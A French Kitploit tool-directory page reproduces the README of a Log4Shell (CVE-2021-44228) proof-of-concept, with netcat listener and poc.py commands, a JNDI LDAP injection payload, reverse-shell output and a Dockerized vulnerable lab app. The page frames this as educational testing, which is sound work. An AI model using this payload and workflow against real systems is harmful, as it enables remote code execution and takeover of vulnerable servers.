Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-demo — Exploit de preuve de concept pour CVE-2021-44228 (Log4Shell) avec configuration automatisée de serveur LDAP/HTTP et génération de payload de reverse shell pour des tests éducatifs. | Kitploit
Outils/GitHubGitHub/hoanle396/cve-2021-44228-demo
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubhoanle396/cve-2021-44228-demo

CVE-2021-44228-demo

Exploit de preuve de concept pour CVE-2021-44228 (Log4Shell) avec configuration automatisée de serveur LDAP/HTTP et génération de payload de reverse shell pour des tests éducatifs.

Voir le dépôt
13il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4j-shell-poc

Preuve de concept pour la vulnérabilité récemment découverte CVE-2021-44228.

Récemment, une nouvelle vulnérabilité a été découverte dans log4j, une bibliothèque de journalisation Java très largement utilisée dans des applications comme Elasticsearch, Minecraft et bien d'autres.

Dans ce dépôt se trouvent un exemple d'application vulnérable et un exploit de preuve de concept (PoC).

Preuve de concept (PoC)

En tant que PoC, un fichier Python automatise le processus.

Prérequis

root@kitploit:~
pip install -r requirements.txt

Utilisation

  • Démarrez un écouteur netcat pour accepter la connexion du reverse shell.
root@kitploit:~
nc -lvnp <netcat-port=example=2034>
  • Lancez l'exploit.
    Remarque : Pour que cela fonctionne, l'archive Java extraite doit être nommée jdk1.8.0_20 et se trouver dans le même répertoire.
root@kitploit:~
$ python3 poc.py --userip <your-ip-address> --webport <web-server-port=default=8000> --lport <netcat-listen-port=default=2034>

[!] CVE: CVE-2021-44228

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<your-ip-address>:1389/a}

Listening on 0.0.0.0:1389

Ce script configure pour vous le serveur HTTP et le serveur LDAP, et crée également la charge utile que vous pouvez utiliser pour coller dans le paramètre vulnérable. Après cela, si tout s'est bien passé, vous devriez obtenir un shell sur le port d'écoute.


Application vulnérable

Un Dockerfile est fourni avec l'application Web vulnérable. Vous pouvez l'utiliser en suivant les étapes ci-dessous :

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run  -p 8080:8080 log4j-shell-poc

Une fois qu'elle est en cours d'exécution, vous pouvez y accéder sur localhost:8080


Obtention de la version Java.

Remarque : Vous devez créer un compte pour pouvoir télécharger le package.

Une fois que vous avez téléchargé et extrait l'archive, vous trouverez java et quelques binaires associés dans jdk1.8.0_20/bin.
Remarque : Assurez-vous d'extraire le dossier JDK dans ce dépôt avec le même nom pour que cela fonctionne.

root@kitploit:~
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Avertissement

Ce dépôt n'est pas destiné à être un exploit en un clic pour CVE-2021-44228. Le but de ce projet est d'aider les gens à apprendre cette vulnérabilité et peut-être à tester leurs propres applications (il existe toutefois de meilleures applications à cet effet, par exemple : https://log4shell.tools/).

Télécharger l’outil